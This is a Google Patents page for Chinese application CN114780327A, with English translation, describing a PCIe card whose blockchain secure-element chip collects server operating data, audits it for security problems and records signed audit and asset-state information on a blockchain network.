CN114780327A - Server monitoring method, asset management method and PCIE card - Google Patents
Server monitoring method, asset management method and PCIE card Download PDFInfo
- Publication number
- CN114780327A CN114780327A CN202111479501.9A CN202111479501A CN114780327A CN 114780327 A CN114780327 A CN 114780327A CN 202111479501 A CN202111479501 A CN 202111479501A CN 114780327 A CN114780327 A CN 114780327A
- Authority
- CN
- China
- Prior art keywords
- server
- information
- chip
- pcie
- network
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000000034 method Methods 0.000 title claims abstract description 71
- 238000007726 management method Methods 0.000 title claims abstract description 38
- 238000012544 monitoring process Methods 0.000 title claims abstract description 23
- 238000012550 audit Methods 0.000 claims abstract description 135
- 238000004891 communication Methods 0.000 claims description 24
- 230000008569 process Effects 0.000 claims description 18
- 238000009434 installation Methods 0.000 claims description 4
- 230000036541 health Effects 0.000 claims description 3
- 238000012545 processing Methods 0.000 description 13
- 238000010586 diagram Methods 0.000 description 9
- 241000700605 Viruses Species 0.000 description 5
- 238000012790 confirmation Methods 0.000 description 4
- 238000011156 evaluation Methods 0.000 description 4
- 230000002159 abnormal effect Effects 0.000 description 2
- 230000006870 function Effects 0.000 description 2
- 230000007246 mechanism Effects 0.000 description 2
- 230000002093 peripheral effect Effects 0.000 description 2
- 238000012795 verification Methods 0.000 description 2
- 238000013459 approach Methods 0.000 description 1
- 230000006399 behavior Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000005540 biological transmission Effects 0.000 description 1
- 238000004364 calculation method Methods 0.000 description 1
- 238000013500 data storage Methods 0.000 description 1
- 230000007812 deficiency Effects 0.000 description 1
- 238000001514 detection method Methods 0.000 description 1
- 230000006872 improvement Effects 0.000 description 1
- 238000007689 inspection Methods 0.000 description 1
- 230000000670 limiting effect Effects 0.000 description 1
- 238000004519 manufacturing process Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 230000000737 periodic effect Effects 0.000 description 1
- 238000004321 preservation Methods 0.000 description 1
- 238000010200 validation analysis Methods 0.000 description 1
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F11/00—Error detection; Error correction; Monitoring
- G06F11/30—Monitoring
- G06F11/3055—Monitoring arrangements for monitoring the status of the computing system or of the computing system component, e.g. monitoring if the computing system is on, off, available, not available
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F11/00—Error detection; Error correction; Monitoring
- G06F11/30—Monitoring
- G06F11/3003—Monitoring arrangements specially adapted to the computing system or computing system component being monitored
- G06F11/3031—Monitoring arrangements specially adapted to the computing system or computing system component being monitored where the computing system component is a motherboard or an expansion card
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F11/00—Error detection; Error correction; Monitoring
- G06F11/30—Monitoring
- G06F11/3065—Monitoring arrangements determined by the means or processing involved in reporting the monitored data
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/10—Protocols in which an application is distributed across nodes in the network
- H04L67/1097—Protocols in which an application is distributed across nodes in the network for distributed storage of data in networks, e.g. transport arrangements for network file system [NFS], storage area networks [SAN] or network attached storage [NAS]
Landscapes
- Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- Computing Systems (AREA)
- Quality & Reliability (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Mathematical Physics (AREA)
- Storage Device Security (AREA)
Abstract
Description
技术领域technical field
本说明书一个或多个实施例涉及计算机监控领域和计算机资产管理领域,尤其涉及一种服务器监控方法、资产管理方法和PCIE卡。One or more embodiments of this specification relate to the field of computer monitoring and computer asset management, and in particular, to a server monitoring method, an asset management method, and a PCIE card.
背景技术Background technique
在服务器,尤其是数据中心的服务器的监控和资产管理的传统方案是,通过基板管理控制器BMC和服务器OS中内置的代理程序agent,抓取服务器的运行信息,然后发送到数据中心的管理平台上进行安全监控和资产管理。但是,这种方案存在依赖数据中心管理平台进行监控,可能具有监控上的漏洞的问题。因为,通常由于网络传输方面的压力,难以将大量运行信息全部发送及时发送到管理平台,而定期获取的监控信息可能是攻击者篡改后的信息,进而不能根据这些信息发现服务器上的攻击行为。此外,这种方案还存在服务器资产信息通常用于单个平台,难以在多平台进行运用的问题。The traditional solution for monitoring and asset management of servers, especially servers in data centers, is to capture the operating information of the servers through the baseboard management controller BMC and the built-in agent in the server OS, and then send them to the management platform of the data center. security monitoring and asset management. However, this solution has the problem of relying on the data center management platform for monitoring, which may have loopholes in monitoring. Because, usually due to the pressure of network transmission, it is difficult to send a large amount of operation information to the management platform in time, and the monitoring information obtained on a regular basis may be the information tampered with by the attacker, and the attack behavior on the server cannot be found based on this information. In addition, this solution also has the problem that server asset information is usually used on a single platform, and it is difficult to use it on multiple platforms.
因此,需要一种新的服务器监控和资产管理方法。Therefore, a new approach to server monitoring and asset management is needed.
发明内容SUMMARY OF THE INVENTION
本说明书中的实施例旨在提供新的服务器监控和资产管理方法,在服务器中安装配置有独立第三方区块链芯片的PCIE卡,通过该区块链芯片获取服务器运行信息,并对服务器运行信息进行安全审核,将审核结果发送到区块链网络,提高对于服务器上出现的安全问题的检测能力;以及将运行信息中与服务器资产状态对应的信息,发送到区块链网络,用于产生服务器资产的凭证,便于服务器资产在多方、多平台之间的交易与流通,解决现有技术中的不足。The embodiments in this specification aim to provide a new server monitoring and asset management method. A PCIE card configured with an independent third-party blockchain chip is installed in the server, the server operation information is obtained through the blockchain chip, and the server is run Information security audit, send the audit results to the blockchain network, improve the ability to detect security problems on the server; and send the information corresponding to the server asset status in the operating information to the blockchain network for generating The certificate of server assets facilitates the transaction and circulation of server assets among multiple parties and platforms, and solves the deficiencies in the prior art.
根据第一方面,提供了一种服务器监控方法,所述服务器设置有第一PCIE卡,所述第一PCIE卡设置有区块链芯片,所述方法由所述区块链芯片执行,所述方法包括:According to a first aspect, a server monitoring method is provided, the server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, the method is executed by the blockchain chip, the Methods include:
通过目标接口,获取所述服务器的运行信息;Obtain the operation information of the server through the target interface;
根据所述运行信息,确定所述服务器的安全审核信息;According to the operation information, determine the security audit information of the server;
将所述安全审核信息保存到区块链网络。Save the security audit information to the blockchain network.
在一种可能的实施方式中,所述服务器的操作系统OS内置有第一代理程序;In a possible implementation manner, the operating system OS of the server has a built-in first agent program;
所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes:
通过第一接口,从所述第一代理程序获取服务器的带内信息;Obtain the in-band information of the server from the first agent through the first interface;
根据所述运行信息,确定所述服务器的安全审核信息,包括:According to the operation information, determine the security audit information of the server, including:
根据所述带内信息,确定带内信息的第一审核信息。According to the in-band information, first audit information of the in-band information is determined.
在一种可能的实施方式中,所述带内信息包括:服务器的硬件信息、固件/内核版本、服务器进程信息、端口信息、用户账号信息、crontab文件、系统日志中的一种或多种;In a possible implementation manner, the in-band information includes: one or more of server hardware information, firmware/kernel version, server process information, port information, user account information, crontab file, and system log;
所述第一审核信息包括:服务器配置的审核信息、端口控制的审核信息、网络防火墙操作的审核信息、操作系统启动过程的审核信息、服务器多操作系统启动管理器的审核信息、操作系统登录的审核信息、应用可信度量的审核信息、硬盘存储数据输入输出的审核信息、内核漏洞的审核信息中的一种或多种。The first audit information includes: audit information of server configuration, audit information of port control, audit information of network firewall operation, audit information of operating system startup process, audit information of server multi-operating system startup manager, operating system login information. One or more of audit information, audit information of application credibility metrics, audit information of hard disk storage data input and output, and audit information of kernel vulnerabilities.
在一种可能的实施方式中,所述服务器上还设置有基板管理控制器BMC,In a possible implementation manner, the server is further provided with a baseboard management controller BMC,
所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes:
通过第二接口,从BMC获取服务器的带外信息;Obtain out-of-band information of the server from the BMC through the second interface;
根据所述运行信息,确定所述服务器的安全审核信息,包括:According to the operation information, determine the security audit information of the server, including:
根据所述带外信息,确定带外信息的第二审核信息。According to the out-of-band information, second audit information of the out-of-band information is determined.
在一种可能的实施方式中,所述第二接口为支持NCSI协议的接口。In a possible implementation manner, the second interface is an interface supporting the NCSI protocol.
在一种可能的实施方式中,所述带外信息包括:带外日志、带外告警、带外传感器信息中的一种或多种;In a possible implementation manner, the out-of-band information includes: one or more of out-of-band logs, out-of-band alarms, and out-of-band sensor information;
所述第二审核信息包括:服务器健康状态的审核信息。The second audit information includes: audit information of the server health state.
在一种可能的实施方式中,通过目标接口,获取所述服务器的运行信息,包括:In a possible implementation manner, the operation information of the server is obtained through the target interface, including:
通过第三接口,获取所述服务器在启动后、而服务器OS启动前的中间信息;所述第三接口包括串口/串口重定向SOL;Obtain the intermediate information after the server is started and before the server OS is started through the third interface; the third interface includes serial port/serial port redirection SOL;
根据所述运行信息,确定所述服务器的安全审核信息,包括:According to the operation information, determine the security audit information of the server, including:
根据所述中间信息,确定第三审核信息。According to the intermediate information, third audit information is determined.
在一种可能的实施方式中,通过目标接口,获取所述服务器的运行信息,包括:In a possible implementation manner, the operation information of the server is obtained through the target interface, including:
通过第四接口,获取所述服务器的网络通信信息;所述第四接口包括所述服务器上设置的网卡的标准接口;Obtain network communication information of the server through a fourth interface; the fourth interface includes a standard interface of a network card set on the server;
根据所述运行信息,确定所述服务器的安全审核信息,包括:According to the operation information, determine the security audit information of the server, including:
根据所述网络通信信息,确定与网络通信相关的第四审核信息。According to the network communication information, fourth audit information related to the network communication is determined.
在一种可能的实施方式中,所述第一PCIE卡包括,PCIE网卡/PCIE GPU卡/PCIEHBA 卡中的一种。In a possible implementation manner, the first PCIE card includes one of a PCIE network card/PCIE GPU card/PCIEHBA card.
在一种可能的实施方式中,所述区块链芯片中存储有所述区块链芯片对应的芯片ID,以及与该芯片ID对应的公私钥对;所述将所述安全审核信息保存到区块链,包括:In a possible implementation manner, the blockchain chip stores a chip ID corresponding to the blockchain chip, and a public-private key pair corresponding to the chip ID; the security audit information is stored in the Blockchain, including:
利用所述公私钥对中的私钥,对所述安全审核信息进行签名,得到芯片签名;Using the private key in the public-private key pair, the security audit information is signed to obtain a chip signature;
将所述安全审核信息,所述芯片签名一并上传至所述区块链网络。Upload the security audit information and the chip signature to the blockchain network together.
在一种可能的实施方式中,所述方法还包括,在将所述安全审核信息,所述芯片签名一并上传至所述区块链网络之前,In a possible implementation manner, the method further includes, before uploading the security audit information and the chip signature to the blockchain network together,
利用所述芯片ID,在区块链网络上注册所述区块链芯片。Using the chip ID, the blockchain chip is registered on the blockchain network.
在一种可能的实施方式中,所述芯片ID对应的公私钥对,通过与所述区块链网络的协商确定。In a possible implementation manner, the public-private key pair corresponding to the chip ID is determined through negotiation with the blockchain network.
根据第二方面,提供了一种服务器资产管理方法,所述服务器设置有第一PCIE卡,所述第一PCIE卡设置有区块链芯片,所述方法由所述区块链芯片执行,所述方法包括:According to a second aspect, a server asset management method is provided, the server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, the method is executed by the blockchain chip, and the The methods described include:
通过目标接口,获取所述服务器的运行信息;Obtain the operation information of the server through the target interface;
将所述服务器的运行信息,保存到区块链网络,并用于产生服务器资产状态的凭证。The operation information of the server is saved to the blockchain network and used to generate the certificate of the server asset status.
在一种可能的实施方式中,所述服务器的操作系统OS内置有第一代理程序;In a possible implementation manner, the operating system OS of the server has a built-in first agent program;
所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes:
通过第一接口,从所述第一代理程序获取服务器的带内信息。Through the first interface, the in-band information of the server is acquired from the first agent program.
在一种可能的实施方式中,所述带内信息包括:服务器使用时间、服务器上的应用的安装记录和使用记录中的一种或多种。In a possible implementation manner, the in-band information includes one or more of: server usage time, installation records and usage records of applications on the server.
在一种可能的实施方式中,所述服务器上还设置有基板管理控制器BMC,In a possible implementation manner, the server is further provided with a baseboard management controller BMC,
所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes:
通过第二接口,从BMC获取服务器的带外信息。Through the second interface, the out-of-band information of the server is obtained from the BMC.
在一种可能的实施方式中,所述第二接口为支持NCSI协议的接口。In a possible implementation manner, the second interface is an interface supporting the NCSI protocol.
在一种可能的实施方式中,所述带外信息包括:b ios/bmc fw版本、OS版本、硬盘容量/硬盘个数、内存容量/内存条数量、主板SN序列号/生产厂家/型号、电源型号 /SN号中的一种或多种。In a possible implementation manner, the out-of-band information includes: bios/bmc fw version, OS version, hard disk capacity/number of hard disks, memory capacity/number of memory sticks, motherboard SN serial number/manufacturer/model, One or more of the power supply model/SN number.
在一种可能的实施方式中,所述第一PCIE卡为PCIE网卡,In a possible implementation manner, the first PCIE card is a PCIE network card,
所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes:
通过介质无关接口MII或简化吉比特介质无关接口RGMII,获取所述PCIE网卡的Mac地址和/或序列号。Obtain the Mac address and/or serial number of the PCIE network card through the medium independent interface MII or the simplified gigabit medium independent interface RGMII.
在一种可能的实施方式中,所述第一PCIE卡包括,PCIE网卡/PCIE GPU卡/PCIEHBA 卡中的一种。In a possible implementation manner, the first PCIE card includes one of a PCIE network card/PCIE GPU card/PCIEHBA card.
在一种可能的实施方式中,所述芯片ID对应的公私钥对,通过与所述区块链网络的协商确定。In a possible implementation manner, the public-private key pair corresponding to the chip ID is determined through negotiation with the blockchain network.
在一种可能的实施方式中,所述服务器资产状态的凭证用于所述服务器资产的登记、确权、评估、鉴定、估值、托管中一项或多项。In a possible implementation, the credential of the server asset status is used for one or more of registration, confirmation, evaluation, authentication, valuation, and custody of the server asset.
根据第三方面,提供了一种PCIE卡,包括区块链芯片,所述区块链芯片包括存储模块,信息获取模块,上链模块,其中,According to a third aspect, a PCIE card is provided, including a blockchain chip, and the blockchain chip includes a storage module, an information acquisition module, and an uplink module, wherein,
所述存储模块用于存储所述区块链芯片的身份标识;The storage module is used to store the identity of the blockchain chip;
所述信息获取模块用于,在所述PCIE卡安装到服务器中时,通过目标接口,获取所述服务器的运行信息;The information acquisition module is used to acquire the operation information of the server through the target interface when the PCIE card is installed in the server;
所述上链模块用于,基于所述存储模块存储的身份标识,将服务器信息保存到区块链网络,其中所述服务器信息基于所述运行信息得到。The on-chain module is configured to save server information to the blockchain network based on the identity identifier stored by the storage module, wherein the server information is obtained based on the operation information.
在一种可能的实施方式中,所述PCIE卡还包括,审核模块,用于根据所述运行信息,确定所述服务器的安全审核信息,以所述安全审核信息作为所述服务器信息。In a possible implementation manner, the PCIE card further includes an audit module configured to determine security audit information of the server according to the operation information, and use the security audit information as the server information.
在一种可能的实施方式中,所述身份标识为所述区块链芯片出厂设置的芯片ID,所述存储模块还存储有该芯片ID对应于所述区块链网络的公私钥对。In a possible implementation manner, the identity identifier is a chip ID that is factory-set by the blockchain chip, and the storage module further stores a public-private key pair corresponding to the chip ID of the blockchain network.
在一种可能的实施方式中,所述服务器的操作系统OS内置有第一代理程序,所述信息获取模块进一步用于:In a possible implementation manner, the operating system OS of the server has a built-in first agent program, and the information acquisition module is further configured to:
通过PCIE总线,获取所述第一代理程序发送的所述服务器的带内信息。Obtain the in-band information of the server sent by the first agent program through the PCIE bus.
在一种可能的实施方式中,所述PCIE卡为PCIE网卡,所述PCIE网卡还包括主控芯片,所述主控芯片与所述区块链芯片通过交换芯片相连接。In a possible implementation manner, the PCIE card is a PCIE network card, and the PCIE network card further includes a main control chip, and the main control chip is connected to the blockchain chip through a switch chip.
在一种可能的实施方式中,所述服务器上还设置有基板管理控制器BMC,所述PCIE网卡设置有支持NCSI协议的专用网口,所述信息获取模块进一步用于:In a possible implementation manner, the server is further provided with a baseboard management controller BMC, the PCIE network card is provided with a dedicated network port supporting the NCSI protocol, and the information acquisition module is further configured to:
通过所述专用网口,获取所述BMC发送的所述服务器的带外信息。Obtain out-of-band information of the server sent by the BMC through the dedicated network port.
在一种可能的实施方式中,所述信息获取模块进一步用于:In a possible implementation, the information acquisition module is further configured to:
通过串口重定向SOL,获取所述服务器在启动后、而服务器OS启动前的中间信息。The SOL is redirected through the serial port to obtain the intermediate information after the server is started but before the server OS is started.
在一种可能的实施方式中,所述信息获取模块进一步用于:In a possible implementation, the information acquisition module is further configured to:
通过PCIE网卡上的标准网口,获取服务器的网络通信信息。Obtain the network communication information of the server through the standard network port on the PCIE network card.
利用以上各个方面中的方法、PCIE卡中的一个或多个,可以有效的提高对于服务器的安全问题的监控能力,以及增强服务器资产在多方、多平台上的交易与流通能力。Using one or more of the methods in the above aspects and the PCIE card can effectively improve the monitoring capability for server security issues, and enhance the transaction and circulation capabilities of server assets on multiple parties and platforms.
附图说明Description of drawings
为了更清楚说明本发明实施例的技术方案,下面将对实施例描述中所需使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。In order to illustrate the technical solutions of the embodiments of the present invention more clearly, the following briefly introduces the drawings used in the description of the embodiments. Obviously, the drawings in the following description are only some embodiments of the present invention. For those of ordinary skill in the art, other drawings can also be obtained from these drawings without any creative effort.
图1示出根据本说明书实施例的一种服务器监控和资产管理方法、及其利用的PCIE 卡的原理示意图;FIG. 1 shows a schematic diagram of a server monitoring and asset management method and a PCIE card used therefor according to an embodiment of the present specification;
图2示出根据本说明书实施例的一种服务器监控方法的流程图;FIG. 2 shows a flowchart of a server monitoring method according to an embodiment of the present specification;
图3示出根据本说明书实施例的通过PCIE网卡常规网口获取中间运行信息的示意图;3 shows a schematic diagram of obtaining intermediate operation information through a conventional network port of a PCIE network card according to an embodiment of the present specification;
图4示出根据本说明书实施例的通过PCIE网卡常规网口获取网络通讯信息的示意图;4 shows a schematic diagram of acquiring network communication information through a conventional network port of a PCIE network card according to an embodiment of the present specification;
图5示出根据本说明书实施例的通过服务器上其他网卡上的网口获取网络通讯信息的示意图;5 shows a schematic diagram of acquiring network communication information through network ports on other network cards on the server according to an embodiment of the present specification;
图6示出根据本说明书实施例的通过PCIE网卡常规网口发送上链数据的示意图;6 shows a schematic diagram of sending uplink data through a conventional network port of a PCIE network card according to an embodiment of the present specification;
图7示出示出根据本说明书实施例的通过服务器上其他网卡上的网口发送上链数据的示意图;FIG. 7 shows a schematic diagram of sending uplink data through network ports on other network cards on the server according to an embodiment of the present specification;
图8示出根据本说明书实施例的一种服务器资产管理方法的流程图;FIG. 8 shows a flowchart of a server asset management method according to an embodiment of the present specification;
图9示出根据本说明书实施例的PCIE卡的结构图。FIG. 9 shows a structural diagram of a PCIE card according to an embodiment of the present specification.
具体实施方式Detailed ways
下面将结合附图,对本发明书提供的方案进行描述。The solution provided by the present invention will be described below with reference to the accompanying drawings.
如前所述,数据中心服务器监控和资产管理的传统方法是通过BMC和OS内置agent,进行服务运行信息抓取,并通过数据中心的管理平台进行服务器管理。这种传统管理方法存在如下问题:1)服务器运行过程中,依赖于数据中心的管理平台的监控,在服务器本地没有独立和有效的第三方(即独立于服务器处理器之外的)对服务器的软硬件操作,进行审计监管。利用这种方式对于服务器进行的监控,存在着安全漏洞。例如,在服务器上发生恶意登入操作之后,攻击者往往会采取删除操作日志中的记录等方式,来清除恶意操作的痕迹。而由于服务器的运行信息通常有很多种类,数据量也很大,难以全部实时的发送到管理平台,通常例如采用定时发送的方式。所以,发送到管理平台的操作日志可能是被攻击者串改后的日志,使得管理平台无法发现服务器上的恶意登入。2)数据中心获取的服务器运行信息中的服务器资产状态信息,一方面通常只保留在单个数据中心平台,另一方面信息获取过程,也缺乏独立第三方的背书。因此,无法方便、可信的在外部多方、多平台之间共享,进而用于服务器资产在多方、多平台之间的交易或流通。As mentioned above, the traditional method of data center server monitoring and asset management is to capture service operation information through the BMC and OS built-in agent, and manage the server through the data center management platform. This traditional management method has the following problems: 1) During the operation of the server, depending on the monitoring of the management platform of the data center, there is no independent and effective third party (ie independent of the server processor) locally on the server to monitor the server. Software and hardware operation, audit supervision. Using this method to monitor the server, there is a security loophole. For example, after a malicious login operation occurs on the server, attackers often delete records in the operation log to remove traces of malicious operations. However, since there are usually many types of server operation information and a large amount of data, it is difficult to send all the information to the management platform in real time. Therefore, the operation log sent to the management platform may be the log modified by the attacker, so that the management platform cannot detect malicious logins on the server. 2) The server asset status information in the server operation information obtained by the data center is usually only kept on a single data center platform on the one hand, and on the other hand, the information acquisition process also lacks the endorsement of an independent third party. Therefore, it cannot be easily and credibly shared among external parties and platforms, and then used for the transaction or circulation of server assets among multiple parties and platforms.
为了解决上述技术问题,本说明书实施例提供了一种服务器监控方法、资产管理方法和相应的PCIE卡。该方法的核心思想是,在服务器安装中携带区块链处理芯片的PCIE卡,PCIE卡上的区块链处理芯片,可以通过服务器OS上运行的代理程序和BMC等,获取服务器的带内和带外运行信息,然后对运行信息进行安全审核,将得到的审核信息,保存到区块链网络中。同时,还可以将服务器的运行信息中,与服务器资产状态相关的信息,发送到区块链网络,用于生成服务器资产的凭证,这些凭证可以用于服务器资产的登记、确权、评估等等。具体的,区块链处理芯片可以是SE(Secure Element,安全元件)芯片,SE芯片本身类似于独立的第三方微型计算机,具有独立的芯片操作系统(COS)和数据存储区域,可以进行例如数据安全存储、加解密运算和业务计算等。服务器上的处理器无法自由的访问区块链处理芯片中的数据,也无法获知其计算过程。因此,一方面,包括了区块链处理芯片的PCIE卡安装在服务器上,方便区块链处理芯片及时获取本地服务器的大量运行信息(无需通过网络传输到远程数据中心),并对这些运行信息进行,例如实时或准实时的安全审核,从而可以及时发现服务器上出现的安全问题。例如,在攻击者恶意登入服务器的期间,及时获取服务器的操作日志,则可以通过操作日志发现服务器上发生的恶意登入操作。并且,区块链处理芯片本身是安全的,服务器攻击者通常不可能访问到区块链处理芯片本身的计算过程或存储的数据,也就不能影响区块链处理芯片的处理过程或篡改其审结结果。如此,该方法提高了对于服务器上的安全问题的监控能力。另一方面,区块链处理芯片本身是独立于服务器处理器的,并且,它将获取的服务器资产状态信息例如签名后,发送到区块链网络。而区块链网络本身是分布式的,其中例如可以包括多个参与方的节点。因此,区块链处理芯片发送的服务器资产状态信息,可以用于在区块链网络中,生成服务器资产状态的凭证,该凭证可以用于服务器资产的登记、确权、鉴定、估值等,从而方便例如区块链多个参与方之间的服务器资产的交易和流通。或者进一步用于,不同的区块链网络之间的服务器资产的交易和流通。In order to solve the above technical problems, the embodiments of this specification provide a server monitoring method, an asset management method and a corresponding PCIE card. The core idea of this method is that the PCIE card carrying the blockchain processing chip in the server installation, and the blockchain processing chip on the PCIE card can obtain the in-band and Out-of-band operation information, and then conduct a security audit on the operation information, and save the obtained audit information in the blockchain network. At the same time, the information related to the status of the server assets in the server operation information can also be sent to the blockchain network to generate the certificates of the server assets. These certificates can be used for the registration, confirmation, evaluation, etc. of the server assets. . Specifically, the blockchain processing chip may be an SE (Secure Element, secure element) chip. The SE chip itself is similar to an independent third-party microcomputer, with an independent chip operating system (COS) and data storage area, which can perform data processing such as Secure storage, encryption and decryption operations, and business computing. The processor on the server cannot freely access the data in the blockchain processing chip, nor can it know its calculation process. Therefore, on the one hand, the PCIE card including the blockchain processing chip is installed on the server, which facilitates the blockchain processing chip to obtain a large amount of operation information of the local server in time (without transmitting it to the remote data center through the network), and to analyze the operation information. Conduct, for example, real-time or quasi-real-time security audits, so that security issues on the server can be discovered in a timely manner. For example, during the period when the attacker maliciously logs into the server, the operation log of the server is obtained in time, and the malicious login operation that occurs on the server can be found through the operation log. In addition, the blockchain processing chip itself is safe, and it is usually impossible for server attackers to access the computing process or stored data of the blockchain processing chip itself, and thus cannot affect the processing process of the blockchain processing chip or tamper with its conclusion. result. As such, the method improves monitoring capabilities for security issues on the server. On the other hand, the blockchain processing chip itself is independent of the server processor, and it sends the acquired server asset status information such as signatures to the blockchain network. The blockchain network itself is distributed, which, for example, can include nodes of multiple participating parties. Therefore, the server asset status information sent by the blockchain processing chip can be used to generate the server asset status certificate in the blockchain network, which can be used for the registration, confirmation, appraisal, valuation, etc. This facilitates, for example, the transaction and circulation of server assets between multiple participants in the blockchain. Or further used, the transaction and circulation of server assets between different blockchain networks.
图1示出根据本说明书实施例的一种服务器监控方法、资产管理方法和PCIE卡的原理示意图。下面结合图1,阐述该方法的主要思想。图1所示的实施例中,所述PCIE 网卡具体为PCIE网卡,该PCIE网卡上设置有区块链芯片。PCIE网卡通常通过插入服务器的PCIE插槽中,安装到目标服务器。在PCIE网卡安装到目标服务器后,区块链芯片可以通过PCIE总线,获取服务器OS上运行的代理程序发送的服务器运行信息。一般而言,在服务器管理中,获取服务器的运行信息通常可以分为两个层次,即带内信息和带外信息,带内信息主要是在服务器启动后,通过服务器OS获取的服务器运行信息。带外信息是指无论服务器启动或不启动,通过BMC获取的服务器的运行信息。该区块链芯片可以通过交换芯片和PCIE网卡的主控芯片(MAC芯片)连接。由于服务器上的网卡通常具有业务上的通讯任务,例如连接内网或外网,这些业务需要占用服务器上的常规网络接口。因此,在常规网络接口之外,该PCIE网卡上设置有专用网络接口,该专用网络接口连接交换芯片,BMC可以通过该专用网络接口和NSCI协议,将带外信息发送到区块链芯片。FIG. 1 shows a schematic diagram of the principles of a server monitoring method, an asset management method, and a PCIE card according to an embodiment of the present specification. The main idea of the method is described below with reference to FIG. 1 . In the embodiment shown in FIG. 1 , the PCIE network card is specifically a PCIE network card, and the PCIE network card is provided with a blockchain chip. The PCIE network card is usually installed on the target server by inserting it into the PCIE slot of the server. After the PCIE network card is installed on the target server, the blockchain chip can obtain the server operation information sent by the agent program running on the server OS through the PCIE bus. Generally speaking, in server management, obtaining server operation information can usually be divided into two levels, namely in-band information and out-of-band information. In-band information is mainly server operation information obtained through the server OS after the server is started. Out-of-band information refers to the running information of the server obtained through the BMC regardless of whether the server is started or not. The blockchain chip can be connected to the main control chip (MAC chip) of the PCIE network card through a switch chip. Since the network card on the server usually has business communication tasks, such as connecting to an internal network or an external network, these services need to occupy a conventional network interface on the server. Therefore, in addition to the conventional network interface, the PCIE network card is provided with a dedicated network interface, which is connected to the switching chip, and the BMC can send out-of-band information to the blockchain chip through the dedicated network interface and the NSCI protocol.
在获取包括带内和带外信息在内的服务器运行信息后,区块链芯片可以根据带内和带外信息,对服务器进行安全审核。具体的,区块链芯片可以根据不同类型的运行信息,进行不同类型的安全审核。例如,在一个例子中,获取的服务器运行信息包括服务器的登入记录,则可以根据登入记录,确定服务器上当前是否发生恶意登入。在一个实施例中,区块链芯片例如还可以通过串口重定向SOL(Serial Over Lan,局域网串行),利用PCIE网卡上的常规网口,获取服务器在启动后、而服务器OS启动前的中间信息。并利用该中间信息,对于服务器启动后、而服务器OS启动前的中间过程进行安全审核,例如进行病毒检测。在又一个实施例中,区块链芯片还可以利用PCIE 网卡上的常规网口,获取服务器的网络通信信息,并根据所述网络通信信息,进行流量安全审核。After obtaining server operation information including in-band and out-of-band information, the blockchain chip can conduct security audits on the server based on the in-band and out-of-band information. Specifically, blockchain chips can perform different types of security audits based on different types of operating information. For example, in an example, the obtained server operation information includes the log-in record of the server, and it can be determined whether malicious login currently occurs on the server according to the log-in record. In one embodiment, the blockchain chip can also redirect SOL (Serial Over Lan, serial over LAN) through a serial port, for example, and use the conventional network port on the PCIE network card to obtain the middle of the server after the server is started and before the server OS is started. information. And using the intermediate information, security audit is performed on the intermediate process after the server is started but before the server OS is started, for example, virus detection is performed. In yet another embodiment, the blockchain chip may also use a conventional network port on a PCIE network card to obtain network communication information of the server, and perform traffic security audit according to the network communication information.
在进行各种类型的安全审核之后,区块链芯片可以通过PCIE网卡将各种审核结果,发送到区块链网络。为保留原始信息,便于事后验证,在一个实施例中,还可以将运行信息中与审核结果直接对应的部分,发送到区块链网络。如前所述,来源于服务器本地的区块链芯片的独立审核,即保证了安全审核的及时性,也提高了审核过程本身的安全性,整体提高了服务器的安全监控能力。并且,审核信息发送到区块链网络之后,由于区块链本身的机制,使得保存于其上的审核信息在事后难以篡改,也加强了审核信息例如在事后检查时的可信度。After various types of security audits, the blockchain chip can send various audit results to the blockchain network through the PCIE network card. In order to retain the original information and facilitate post-event verification, in one embodiment, the part of the operation information that directly corresponds to the audit result may also be sent to the blockchain network. As mentioned above, the independent audit of the blockchain chip originating from the server not only ensures the timeliness of the security audit, but also improves the security of the audit process itself, and improves the security monitoring capability of the server as a whole. In addition, after the audit information is sent to the blockchain network, due to the mechanism of the blockchain itself, the audit information stored on it is difficult to tamper with after the fact, and the credibility of the audit information, such as post-mortem inspection, is also strengthened.
服务器的运行信息中可以包括可用于确定服务器资产状态的信息,例如,CPU型号、内存型号、硬盘型号/读写次数等,可以用于证明服务器各个硬件配件是否为较新型号的配件,或者这些配件的使用状态等。因此,还可以将这部分服务器运行信息,发送到区块链网络,用于生成服务器资产状态的凭证,该凭证可以用于服务器资产的登记、确权、评估等等,方便服务器资产的交易和流通。The operating information of the server can include information that can be used to determine the status of the server assets, such as CPU model, memory model, hard disk model/number of reads and writes, etc., which can be used to prove whether each hardware accessory of the server is a newer model accessory, or these Use status of accessories, etc. Therefore, this part of the server operation information can also be sent to the blockchain network to generate a certificate for the status of the server asset, which can be used for the registration, confirmation, evaluation, etc. of the server asset to facilitate the transaction and circulation.
